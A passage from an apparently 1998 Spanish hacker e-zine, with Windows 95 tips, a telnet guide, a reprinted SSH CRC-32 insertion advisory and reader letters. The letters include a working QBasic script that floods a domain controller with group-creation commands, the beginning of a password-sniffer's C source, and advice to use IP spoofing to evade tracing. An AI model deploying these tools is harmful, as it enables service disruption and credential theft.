- este archivo para que los cambios surjan efecto, pero hay que borrarlo
- fuera de la sesion de Windows.. osea.. que hay que reiniciar en modo MS-DOS,
- quitar los atributos al archivo (en MSDOS este se llama shelli~1), borrarlo
- y reiniciar el entorno grafico (hoy en dia llamado sistema operativo.. :P)
- y ya esta, tenemos nuestro icono favorito como icono de carpeta.. :) De
- igual manera con el resto de los iconos del 95.
-
- PD: Importante, si tenemos la utilidad TWEAK UI de las Powertoys de
- Microchof (si, MICROCHOF... ) podemos borrar el cache de iconos desde la
- pestaña Repair, con el boton Rebuid Icons. Y si tenemos el MicroAngelo..
- todo esto nos lo hace ese fantastico programa.. pero conviene saber hacer
- las cosas "a pelo".
-
- 4.INTERFACE DEL W3.11 EN EL W95
-
- este es bastante mas simple que el anterior, lo que tienes que hacer
- es lo siguiente:
- 1- edita el archivo "SYSTEM.INI" (directorio de windows)
- 2- en la seccion "BOOT", busca la linea que pone "SHELL=EXPLORER.EXE"
- 3- cambia lo de "EXPLORER.EXE" por "PROGMAN.EXE"
- 4- reinicia el pc y listo.
-
- 5.ACCESO DIRECTO PARA APAGAR EL PC
-
- esto es de lo mas simple, haz lo siguiente: crea una cceso directo en
- el escritori,vete a propiedades y en loreferente a acceso direco busca
- "DESTINO".alli pones lo siguiente:
- C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows le das a aplicar, acetar y ya
- esta.
-
- 6.cambiar el nombre de "MI PC"
-
- para hacer esot tienes que seguir los siguientes pasos: vete al
- "REGEDIT" cambia la clave::
- HKEY_CLASSES_ROOT\CLSID\{2OD04FE0-3AEA-1069-A2D8-08002B30309D} pon el
- nombre quele quieras poner a "MI PC" y ya esta.
-
- 7.MS2.sys
-
- lo primero que tienes que hacer es localzar este archivo, una vez
- encontrado, para poder editarlo tendras que cambiar sus atributos.
- una vez puedas editarlo, dirijete a la parte de "OPTIONS":
-
- [Options]
-
- BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows.."
- no aparece.
-
- BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95.
-
- BootMenuDefault = 1 El numero de opcion por default.
-
- BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado.
-
- Logo = 0 No despliega la imagen del logo de arranque de Win95.
-
- BootMulti = 1 Hace disponible un doble booteo con DOS.
-
- 8.UTILES DEL SISTEMA
-
- el w95 trae algunas erramientas que te permitiran hacer cosillas
- (algo basicas) muy interesantes para ir empezando, aqui te voy a explicar el
- funcionamiento de dos de ellas el Telnet, un viejo amigo que ya conoce todo
- el mundo y el Ftp, si si, has leido bien el 95 (bueno en realidad el MS2)
- trae una version bastante simple (pero util) de programa FTP.
-
- TELNET.
-
- en la carpeta windows (o como la ayas llamado) hay un .exe que se
- llama Telnet, este programa sirve para hacer conexiones desde tu sistema a
- otro remoto a traves de una red (internet principalmente), en lo que
- consiste basicamente este programa es en acceder a unos determinados
- puesrtos de un sistema remoto en los cuales puedes hacer varias cosas, como
- por ejm: bajarte el correo,mirar el directorio de una web.....
- aqui te expongo una lista de los puertos con una descripcion de para
- lo que vale cada uno de ellos: (el numero que aparece entre parentesis es
- el puerto)
-
- auth (113)
- conference (531)
- courier (530)
- daytime (13)
- discard (9)
- domain (53)
- echo (7)
- efs (520)
- exec (512)
- finger (79)
- ftp (21)
- gopher (70)
- hostnames (101)
- http (80)
- ingreslock (1524)
- link (87)
- login (513)
- mtp (57)
- nameserver (42)
- netbios (139)
- netnews (532)
- netstat (15)
- nntp (119)
- pop2 (109)
- pop3 (110)
- proxy (8080)
- qotd (17)
- remotefs (556)
- rje (77)
- sftp (115)
- shell (514)
- smtp (25)
- spooler (515)
- sunrpc (111)
- supdup (95)
- systat (11)
- telnet (23)
- tempo (526)
- tftp (69)
- time (37)
- uucp (540)
- uucp-path (117)
- whois (43)
- www (80)
-
- ¿como se hace un Telnet?
- pues hacerlo es muy simple:
-
- si nos proporcionan la direccion telnet "maquina.remota.es 2010"
- hariamos lo siguiente: (puede variar segun sistemas):
- * Tecleamos en la linea de comandos "TELNET maquina.remota.es 2010" (En
- otros sistemas teclearemos "TELNET" y despuΘs "OPEN maquina.remota.es
- 2010" ) con lo que veremos algo parecido a esto:
-
- * telnet MAQUINA.REMOTA.ES 2010
- * Trying 130.132.21.53 Port 2010 ...
- * Connected to MAQUINA.REMOTA.ES
- * Escape character is ...
-
- * Esto nos dice mas o menos que esta intentando conectar con la direccion,
- nos devuelve la direccion IP, se conecta, y nos dice cual es el "caracter
- escape".
- * Una vez hemos conectado se nos pide un "login" y/o "password" para entrar
- a la maquina remota. En algunos casos podremos conectar a la maquina
- remota con el login "guest" (invitado) pero la mayoria de las veces
- deberemos saber el login antes de conectarnos.
- * El siguiente paso es configurar la emulacion de terminal, es decir,
- decirle al sitio remoto como queremos que nos muestre los datos en
- nuestra pantalla. La configuracion mas comun es la VT100, que es la
- estandar para las comunicaciones basadas en terminales. (algunos clientes
- telnet configuran ellos la emulacion).
- * El ultimo paso (despues de haber utilizado el servicio es salir ;-) Como
- las pulsaciones de tecla no las hacemos "realmente" en nuestra maquina,
- sino en la maquina remota, necesitamos el "caracter escape" que se nos
- dia al conectar para pasar al "modo comando" ( habitualmente teclas
- control + parentesis derecho ).
-
- Comandos disponibles:
-
- CLOSE Termina la conexion TELNET con la maquina remota y vuelve al
- "modo comando" (si empezamos alli) o sale de TELNET.
- QUIT Sale del programa TELNET; si estas conectado a una maquina
- remota, QUIT te desconecta y luego sale de TELNET.
- SET ECHO Si no ves lo que estas escribiendo, o si escribes y ves doble,
- este comando soluciona el problema.
- OPEN Abre una conexion a una maquina remota.
-
- ATENCION: Al presionar las teclas Enter o Return, sales del modo
- comando TELNET y vuelves a la sesion TELNET. te dejo aqui, investiga y
- juega con telnet, no es muy dificil y pronto aprenderas a usarlo de una
- manera mas "productiva".
-
- FTP-MS2
-
- si entras en Ms2 y en el promp pones "ftp" te saldra esto "ftp>"
- ahora parasaber los comandos que puedes usar pon "?" y te saldra una lista
- de los comandos que puedes usar en el programa, juega con ellos y prueba
- cosas
-
- 9.PROXImamente....
-
- pues la verdad es que no se que voy a incluir, si tienes algo que
- comentar o quieres mandarme cosas nuevas ya sabes mandamelas a
- zed@mixmail.com y sera incluido en la proxima actualizacion
-
- bye--:)
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- CORE SDI S.A.
- Buenos Aires, Argentina
- <http://www.core-sdi.com>
-
- Advertencia de Seguridad
- 11 de Junio de 1998
-
- Ataque de insercion a SSH
-
-
- Esta advertencia trata sobre un problema de seguridad presente
- en el paquete de software SSH que permite a un atacante ejecutar
- comandos arbitrarios en el servidor SSH o, de manera mas general,
- insertar datos arbitrarios en un canal SSH encriptado.
-
-
- Descripcion del problema
- ~~~~~~~~~~~~~~~~~~~~~~~~
- SSH (Secure Shell) es un programa que proporciona autenticacion
- fuerte y comunicaciones seguras sobre canales inseguros.
- Es ampliamente usado para sesiones interactivas remotas, transferencia
- de archivos y encapsulado de otros protocolos en un tunel
- sobre un canal de comunicacions encriptado.
- Todas las comunicaciones son encriptadas automaticamente y
- de manera transparente.
- La encripcion es tambien utilizada para realizar chequeo de la
- integridad de los datos, sin embargo implementaciones actuales
- se basan en un Chequeo Ciclico de Redundancia de 32 bits (CRC-32)
- para verificar la integridad despues de la desencripcion de un
- paquete SSH recibido.
-
- La encripcion se realiza utilizando uno de los algoritmos soportados
- tanto por el cliente como el servidor.
- Una vez establecida una conexion entre cliente y servidor, ambos
- realizan un protocolo de negociacion que incluye autenticacion
- mutua, eleccion de un algoritmo criptografico a utilizar e
- intercambio de una clave de sesion a utilizar con dicho algoritmo.
- Terminada la negociacion se activa la encripcion, todo comunicacion
- subsiguiente esta encriptada.
-
- Los algoritmos de encripcion soportados por la version actual de SSH son:
-
- - Blowfish
- Encriptor de bloque de Bruce Schneier con clave de 128 bits.
- - IDEA
- Encriptor de bloque con clave de 128 bits.
- - DES
- Data Encrryption Standard, encriptor de bloque con clave de 56 bits
- - Triple DES (3DES)
- Version triple de DES con tres claves para un total efectivo
- de 112 bits de clave.
- - ARCFOUR
- Encriptor de canal compatible con RC4 con clave 128 bits
-
- El uso de estos algoritmos en modo CBC (Cipher Block Chaining)
- o CFB ( Cipher FeedBack 64 bits) en conjuncion con CRC-32 para
- realizar chequeo de integridad posibilita un ataque de
- texto conocido (known plaintext attack) con tan solo
- 16 bytes de texto conocido (8 para el caso de IDEA en modo
- CFB) que permite a un atacante insertar paquetes encriptados
- en el canal de comunicacion entre cliente y servidor que
- pasaran las pruebas de integridad y se desencriptaran a
- el texto en claro enviado. De esta manera, un atacante
- podra ejecutar comandos arbitrarios en el servidor.
- El mismo ataque puede realizarse sobre el cliente, aunque
- solo hace posible el envio de datos arbitrarios a la terminal
- del cliente. Las implicacias de un ataque al cliente son
- tal vez no tan como un ataque al servidor pero aun asi deben
- ser consideradas durante el proceso de solucion del problema.
-
- Detalles tecnicos
- ~~~~~~~~~~~~~~~~~
- Despues de la fase de identificacion del protocolo, donde
- el servidor envia un string de texto en claro especificando
- su version de protocolo y de software, toda la comunicacion se
- realiza encapsulando los datos en un formato de paquetes descripto
- como "The Binary Packet Protocol" [1]
-
- Se indica dicho formato a continuacion:
-
- 32 24 16 8 0
- +----------+---------+---------+---------+
- | data length (bytes) |
- +----------+---------+---------+---------+
- | de 1 a 8 bytes de relleno |
- = ( padding ) =
- +----------+---------+---------+---------+
- | type | |
- +----------+ +
- | |
- = data =
- | |
- +----------+---------+---------+---------+
- | CRC-32 |
- +----------+---------+---------+---------+
-
- Data length: Tamanio en bytes del paquete, sin incluir
- el campo 'length' y los bytes de relleno.
- Padding : 8 - (length mod 8) byte de datos aleatorios.
- El uso de datos aleatorios al principio del
- paquete es un inteto por hacer mas dificiles
- ataques de texto en claro conocido
- (known plaintext attacks)
-
- Packet type: Un byte sin signo de 8 bits
- Data : length - 5 bytes de datos
- CRC-32 : 4 bytes para el chequeo de integridad.
- El CRC se calcula antes de realizar
- la encripcion.
-
- La encripcion se realiza sobre los campos 'padding', 'type',
- 'data' y 'CRC', el campo 'length' nunca se encripta. La parte
- encriptada del paquete tiene un tamanio que es siempre multiplo
- de 8 bytes.
-
- Conociendo ciertas caracteristicas de los modos de encripcion
- utilizados (CBC por ejemplo), con un texto en claaro conocido, un
- atacante puede construir un paquete SSH propio ( del tipo
- SSH_CMSG_STDIN_DATA) con los bytes de relleno calculados
- de tal manera que los siguientes 8 bytes del paquete se
- desencriptaran a un texto en claro a eleccion del atacante.
- En este caso en particular, los bytes desencriptados corresponderan
- al campo 'type' y 7 bytes de datos.
- Despues de esto 16 bytes (relleno+tipo+7 bytes de datos) el
- atacante debe incluir una cantidad variable de bytes calculados
- con el proposito especifico de producir un CRC-32 valido para todo
- el paquete una ves que el mismo es desencriptado.
-
- Este ataque y variaciones utilizando la misma tecnica puede realizarse
- debido al uso de un esquema de verificacion de integridad que
- es inherentemente debil. En particular CRC-32 posse ciertas
- propiedades que permiten al atacante generar un paquete con
- datos arbitrario y aun asi obtener un valor de CRC que es valido.
-
- Por supuesto que para que este ataque sea exitoso el atacante
- debe tener acceso al canal encriptado entre cliente y servidor,
- ya sea realizando un ataque activo de red, interponiendose
- entre cliente y servidor a nivel de aplicacion SSH o realizando
- un ataque de toma de sesion TCP.
- Un ataque de este ultimo tipo se describe en [6] y para
- el caso de SSH los dos metodos de de-sincronizacion de
- TCP mencionados pueden ser utilizados.
- Especificamente, el metodo descripto como "Null data
- desynchronization" puede realizarse utilizando paquetes
- SSH de tipo SSH_CMSG_IGNORE.
-
- Es importante senalar que la nueva revision del protocolo
- SSH, propuesta y publicada como Internet Drafts [2], [3], [4]
- y [5] hace uso de codigos de autenticacion de mensajes (MACs)
- criptograficamente fuerte y no suceptibles a este ataque.
-
- Aun cuando se hallan encontrado problemas en el protocolo
- SSH, es todavia una alternativa mucho mas segura que el uso de
- las aplicaciones telnet, rsh y rlogin.
-
- [1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen
- Helsinki University of Technology. November 15th 1995
- (draft expired on May 15th, 1996)
-
- Included as the file ./RFC in the ssh distribution
- <http://www.cs.hut.fi/ssh>
-
- [2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz
- T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
-
- [3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz
- T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
-
- [4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz
- T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
-
- [5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz
- T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
-
- (drafts expired on May 7th, 1998)
-
- Todos los Internet Drafts estan disponibles en:
- <ftp://ftp.isi.edu/internet-drafts/>
-
- [6] "Simple Active Attack Against TCP", Laurent Joncheray,
- Merit Networks Inc., 5th USENIX Security Simposium. 1995.
-
- Impacto:
- ~~~~~~~~
- Un atacante con acceso al canal SSH encriptado puede
- insertar bloque en el canal que se desencriptaran
- a text en claro de su eleccion pusibilitando la ejecucion
- de cualquier comando en el servidor SSH.
-
- Informacion para solucionar el problema
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Haga un upgrade a la version 2 del protocolo SSH,
- disponible al publico en los proximos dias.
-
- Usuarios de la version comercial F-Secure SSH deben
- contactar a Data Fellows Inc. para informacion
- sobre como realizar el upgrade a F-Secure SSH 2.0
-
- Note que la version 2 del protocolo NO es compatible
- con las versiones anteriors y por lo tanto tambien
- necesitara hacer un upgrade de los clientes SSH.
-
- Mientras tanto puede realizar un upgrade a la version
- 1.2.25 de SSH, que soluciona el problema.
- La distribucion 1.2.25 puede obtenerse de:
-
- <ftp://ftp.cs.hut.fi/pub/ssh/ssh-1.2.25.tar.gz>
-
- La version 1.3.5 de F-Secure SSH soluciona este problema.
- Si Ud. usa el paquete comercial Data Fellows SSH y tiene un
- contrato de soporte puede obtener F-Secure SSH de su
- distribuidor local.
- Usuarios sin contrato de soporte pueden obterner un patch
- que soluciona el problema de:
-
- <http://www.DataFellows.com/f-secure/support/ssh/bug/su134patch.html>
-
- Adicionalmente, puede obtener un patch para la distribucion
- libre SSH 1.2.23 y el paquete complete con el patch instalado
- de:
-
- <http://www.core-sdi.com/ssh>
-
- A continuacion se incluyen los hashes MD5 de los archivos
- correspondientes
-
- MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310
- MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869
- MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab
-
- Sistemas vulnerables:
- ~~~~~~~~~~~~~~~~~~~~
- Todos los sistemas utilizando implementacions de la version 1.x
- de SSH son vulnerables. Esto incluye versiones de software hasta
- la 1.2.23 y F-Secure SSH 1.3.4
-
- Para determinar que version de SSH esta corriendo su servidor
- utilice los siguientes comandos:
-
- $ telnet <direccion IP del servidor> 22
- Trying <direccion IP del servidor>...
- Connected to <direccion IP del servidor>.
- Escape character is '^]'.
- SSH-1.5-1.2.23
- \ / \--------- version de software
- |------------ version del protocolo
-
- ^]
- telnet> close
- Connection closed.
- $ exit
-
- Informacion adicional
- ~~~~~~~~~~~~~~~~~~~~~
- Este problema fue descubierto por Ariel Futoransky
- <futo@core-sdi.com> y Emiliano Kargieman <ek@core-sdi.com>
-
- CORE SDI agradece a Tatu Ylonen <ylo@ssh.fi> y Tero Kivinen
- <kivinen@ssh.fi>, quienes realizan el mantenimiento de SSH, por
- su pronta respuesta a los problemas descriptos en esta
- advertencia de seguridad.
-
- La informacion para la solucion del problema en los
- productos F-Secure de Data Fellows Inc. fue proporcionada
- por Olli Voima <olli.voima@DataFellows.com>
-
- Preguntas y comentarios con respecto a esta advertencia
- de seguridad pueden ser enviados a:
-
- Ariel Futoransky <futo@core-sdi.com>
- Emiliano Kargieman <ek@core-sdi.com>
-
- Para mayor informacion sobre CORE SDI S.A. puede contactar a
- <core@core-sdi.com> o visitar <http://www.core-sdi.com>
-
- Si desea contactar a CORE puede utilizar la siguiente clave
- publica de PGP:
-
- Type Bits/KeyID Date User ID
- pub 1024/CF4E0CF5 1998/05/18 CORELABS <corelabs@core-sdi.com>
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.6.3ia
- Comment: Requires PGP version 2.6 or later.
-
- mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio
- DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5
- tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR
- tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5
- z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x
- i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G
- 3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh
- =ulRg
- -----END PGP PUBLIC KEY BLOCK-----
-
- Copyright Notice:
- ~~~~~~~~~~~~~~~~~
- El contenido de esta advertencia de seguridad es Copyright (C)
- 1998 de CORE SDI S.A. y puede ser distribuido libremente
- siempre y cuando se haga en forma gratuita y se otorgue el
- credito apropiado a los autores originales.
-
- $Id: ssh-advisory.txt.esp,v 1.7 1998/06/11 22:05:03 iarce Exp $
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ┌─────────────────┐
- < EL LECTOR OPINA >
- └─────────────────┘
-
- Esta seccion esta funcionando muy bien por lo visto, pero parece
- mentira que incluso en el 6 numero, haya lectores que nos escriban al
- buzon de Hotmail (el cual ya NO es valido) y por otro lado que algunos
- nos envieis mail's preguntado sobre clases o incluso cosas mucho mas
- tontas. Lo recomendable es que penseis antes de enviarnos un mail.
-
- Es una lastima que todavia esta seccion no haya alcanzado el
- dinamismo que nosotros pretendiamos, pero seguiremos en nuestra cruzada de
- intentarlo, algun lector si que se esfuerza en ayudar como podreis
- comprobar mas abajo, por eso a todos esos muchas gracias. Y ahora a
- divertirse :)
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 25 Jul 1998 07:37:13 GMT
- From: Manuel-el oso <sambam@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: guia irc
-
- hola conde,
- que tal?
- acabo de leer tu guhirc.....
- esta genial. Enhorabuena!
-
- Si puedes me gustaria que me contestaras
- a algunas preguntitas:
-
- Que herramienta hay para "dormir
- mi PC portatil" y que al despertar
- este justo en el mismo punto
- donde lo deje?
-
- Como puedo desensamblar un
- binario ejecutable para linux?
-
- existe winzip (o similar)
- para linux?
-
- que newsreader utilizas?
- que newsgroups frecuentas?
-
- muchas gracias
-
- Manu
-
- PD: aupa JJF!
-
- ,-. __ .-,
- --;`. ' `.' "Guantanamera....Guajira guantanamera..."
- / ( ^__^ ) Zzzzz!! ftp.giga.or.at/pub/hacker/Incoming/spv001.zip
- ; `(_`'_)' \ Skate or die! - Madrid 107.4 FM
- ' ` .`--'_, ;
- ~~`-..._)))(((.' sambam@xxxxxxxxxxxxxx
-
- <------>
-
- [ Pues thx por los cumplidos :) Sobre los portatiles, es que eso ya lo
- hacen, mira la caracteristicas del tuyo. Sobre Linux mira el cursillo que
- encontraras en este numero y sobre winzip para Linux, yo no conozco.
- Nunca suelo pasar por las news. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 14 Jul 1998 09:23:23 GMT
- From: jaina7@xxxxxxxxxxxxxx (grieko)
- To: conde_vampiro@usa.net
-
- conde estas ahi?
- que paso bueno te escribo pues para tener a alguien que oriente en mis
- dudas espero respuesta ok sabes algo de novell?
- ok
-
- <------>
-
- [ Como ya hemos dicho muchas veces no damos clases privadas, nuestro consejo
- es que leas este ezine. Sobre novell pillate el FAQ DE NOVELL.
-
- http://www2.s-gimb.lj.edus.si/natan/stuff2.html
- http://www.nmrc.org ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 07 Jul 1998 13:51:20 GMT
- From: "Miguel Soto" <msoto@xxxxxxxxxxxxxx>
-
- Acabo de conocer vuestra pagina a traves de la revista Jump y creo que
- aparte de un buen diseño tiene mucho contenido que leere poco a poco.
- Espero que no desaparezca vuestra direccion, como otras de vuestro style,
- si esto ocurriese o para cualquier otra cuestion mi e-mail es
- rbellamy@xxxxxxxxxxxxxx , soy cuasiinformatico de carrera osease como aquel
- que tiene un primo en Alcala que ni es primo ni es na.
-
- Estoy en el ordenador de un amigo asi que espero que no le echeis mucha
- cuenta al remitente.
-
- Saludos de un Sevillano fan de la informatica y de comun acuerdo con
- vuestra filosofia. Roberto.
-
- <------>
-
- [ ¿ En la revista Jump ?, es la primera noticia que tengo que salimos alli,
- espero que hayan sido buenas criticas :) Nosotros no pensamos desaparecer
- si no todo lo contrario nos expandimos, o sea que no te preocupes y
- siempre estaremos por Inet. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Split <split@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Peticion de un documento txt
-
- Holas, vuelvo a escribiros ya que no he recibido respuesta.
- Os pedia un documento titulado "La Superguia del Hacker" por Nobody
- (hackear desde win95).
- Ya que he estado buscando este doc pero no he podido encontrarlo, puesto
- que hablaron de el en el n 4 de su ezine, en concreto referente a un
- mail :)))
- Sin mas y dandote las gracias
- Split
-
- <------>
-
- [ Garantizado para el nº7 y encima la Version Deluxe :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 10 Jun 1998 02:16:55 GMT
- From: "Angel torrez" <mosqueteros_69@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Ayuda Urgente
-
- Estimado conde Vampiro permitame saludarle y desearle una feliz noche
- (por que me imagino como es usted vampiro solo saldra por las noches)
- bueno como introduccion quiero decirle muchas gracias por todos sus
- escritos nos han servido de mucho, tambien ese texto de hack de una Web
- estaba muy bien, pero nosotros somos un grupo de personas de Nicaragua
- que estamos iniciando en este maravilloso mundo del hackers, por lo cual
- nosotros pedimos su ayuda para que nos guie en esta dificil tarea,
- seremos sus aprendices, es cierto que una de las reglas es no preguntar
- por que supuestamente lo sabemos todo, pero hemos roto esa regla para
- abocarnos a usted conde para que nos enseñe a dar unas que otras
- mordidas en la net, para iniciar tenemos una pequeña duda, cuando
- nosotros nos conectamos por telnet al servidor xxxxx este servidor no
- capta nuestro numero de IP, por lo cual ya nos pueden agarrar, esa es
- nuestra primera pregunta.
- Espero que no la mires tan TONTA.
-
- <------>
-
- [ Pues como siempre decimos lee nuestros ezines y documentos :) No entiendo
- bien tu pregunta, supongo que te refieres a que el server pilla tu IP
- y quieres saber como evitar eso, pues tienes muchas maneras, IP-SPOOFING
- es una de ellas y ahora piensa un poco tu :)
- No existen las preguntas tontas si no preguntas mal formuladas en todo
- caso ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 31 Jul 1998 16:00:33 GMT
- From: <Akira2o0o@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: ............
-
- .............ninguno de tus links de phreak sirven pues e querido bajar
- algunos programas y me sale con que no lo encuentra......que paso pues....
- hay mandame un E-mail cuando las pongan a funcionar...K.....
-
- <------>
-
- [ Ya decimos que actualizamos los link's lo mas rapido posible pero el
- web es muy dinamico, por tanto complicado estar a la ultima. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Miguel Celis" <fliacelis@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: saludos desde colombia
-
- mis felicitaciones por esa excelente y enviciante pagina.
- quisiera comunicarte una inquietud que tengo; fijate como solo estoy
- incursionando al tema de los phreaker y como tengo ese interes tan
- imenso por conocer lo que esconde en sus entrañas este nuevo (para mi
- por lo menos) mundo quisiera que pusieras mas archivos de textos
- refiriendose a este tema ya sea informacion general o especifica.
- Si haces caso a mi peticion, eres tu muy amable.
-
- saludos a tus compañeros hackers, crackers, phreakers y todo lo que se
- invenmten nuevo que termine en "kers".
-
- se despide !el 11!
-
- <------>
-
- [ Pues thx, ya hemos publicado algo de phreak y tienes muchas cosas en
- nuestro web, por lo que recomiendo que te pases por la seccion PHREAK. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Nain <nii97068@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: pregunta
-
- hola,
- acabo de descubrir vuestra revista y me la quiero bajar... todos los nº
- para leerla tranquilamente, sin embargo tengo un problema, siempre que
- intento bajarmela, nunca esta completa... siempre las frases estan cortadas
- por la mitad. que puedo hacer para solucionar esto?
- Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de
- leerla.
-
- Un saludo.udo.
-
- <------>
-
- [ Pues ya hemos puesto un zip con el primer volumen entero y no pinches
- encima del ezine si no que clickea con el mouse y dale al boton derecho
- para salvar el fichero :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "A.A.A" <claw@xxxxxxxxxxxxxx>
- Subject: intereses
-
- Quisiera saber porque mas de la mitad de lugares que poneis en vuestras
- listas no estan disponibles. Os los han cerrado o censurado o simplemente
- no teneis esa informacion.
- Vais a seguir publicando mas i-zine en vuestra web?
- Podrias mandarme direcciones de paginas web para principiantes al hacking,
- phreaking, y virus ya me cuesta encontrar paginas completas da igual que
- esten en ingles.
-
- <------>
-
- [ Ya hemos dicho que es dificil el asunto de los link∩s. ¿¿ Quien dice que
- no vamos a publicar mas ?? Y mas cosas que estamos haciendo ;-)
- Para ver web∩s pasate por la seccion LINKS ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Daniel R. <zago@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Pregunta
-
- Hola acabo de visitar su pagina y me parecio que es una de las mejores que
- he visto pero tengo una pregunta que hacerles:
-
- Quisiera poder conseguir el username y el pasword de una pagina
- (www.anacam.com). Pude bajar "john the ripper vl.4" desde su pagina pero no
- puedo instalarlo, hay un archivo de nombre "install" pero no le entiendo
- como puedo hacerle para poder arrancar el programa. Me podrian ayudar a
- instalar este programa ho recomendarme uno mas facil de usar.
- DE antemano Muchas Gracias
- ATTE.
- Daniel R.
-
- <------>
-
- [ Thx pero NO nos dedicamos a hackear web∩s a peticion de los lectores.
- Pasate por nuestra seccion CRACK y pillate el John, pues es raro porque
- se instala bien, vuelve a probar y leete la ayuda :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Nombre y apellidos <xxxxxxxx@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: subscribe
-
- He intentado bajarme los Zines pero se corta a medio, podeis
- comprimirlos todos en un zip y enviarmelos a jmt1@xxxxxxxxxxxxxx
- Gracias.
-
- <------>
-
- [ No podemos enviarlos a todos los lectores, ya hemos puesto el primer
- volumen en zip y unos cuantos mail∩s arriba explicamos como lo tienes
- que poder bajar correctamente. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Elena <prophet@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: {CyBoRg} Continuacion respuesta
-
- Bueno sigo con la respuesta a DANY, por aki tengo un programilla
- en qbasic que es un DoS, te lo pongo para que veas, este DoS lo
- que hace es que empieza a crear grupos locales en un PDC. Asi
- que en un rato de na el PDC esta saturado de grupos y se llena
- el HD y se queda colgao, (me he pasao explicando lo que hace)
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- DIM var AS INTEGER
- DIM hack1 AS STRING
- DIM hack2 AS STRING
- DO WHILE var < 10000000
- var = var + 1
- hack1 = "hack" + LTRIM$(STR$ (var))
- hack2 = "net localgroup " + hack1 + " /add /domain"
- SHELL hack2
- LOOP
-
- ------------ FIN -------------------------------------------------------------
-
- Bueno, ya si que os dejo de una vez, joder que calor...........
-
- {CyBoRg}
- SHG Security Group
-
- <------>
-
- [ Pues muchas gracias por ayudar con esta seccion :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Elena <prophet@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: {CyBoRg} - SHG Security -
-
- Hi, de nuevo, os envio este mensaje para responder a "DANY" que
- preguntaba sobre troyanos para NT en visual basic o pascal, le
- digo que es muy dificil encontrar algo en estos lenguajes, a no
- ser que lo hagas tu. Nosotros hemos llegado a hacer un
- programilla de seguridad para NT en visual para chapar cosas del
- registro, aunque lo del regedit es un coñazo y mas si se lo
- haces a alguien remotamente :))).
-
- Bueno aqui te pongo el fuente de un programa para capturar pass
- en texto plano es en C, pero bueno, haber si encuentro otro
- troyano que tenia, lo he perdido entre todas las cosas que tengo
- y si lo encuentro lo envio luego.
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- C2MyAzz - Sirve para capturar login y pass en texto plano
-
- */
- #include <dos.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
-
- #pragma pack(1)
-
- #include "c2myazz.h"
-
- #define MAXENTRIES 20
-
- // Function prototypes
-
- void _loadds _far CntrlEntryPt ();
- void _loadds _far RxISR ();
- u8 stuffit(IPpac _far *, PID _far *, u8 _far *);
- void _loadds _far TXCompleteESR();
- void init();
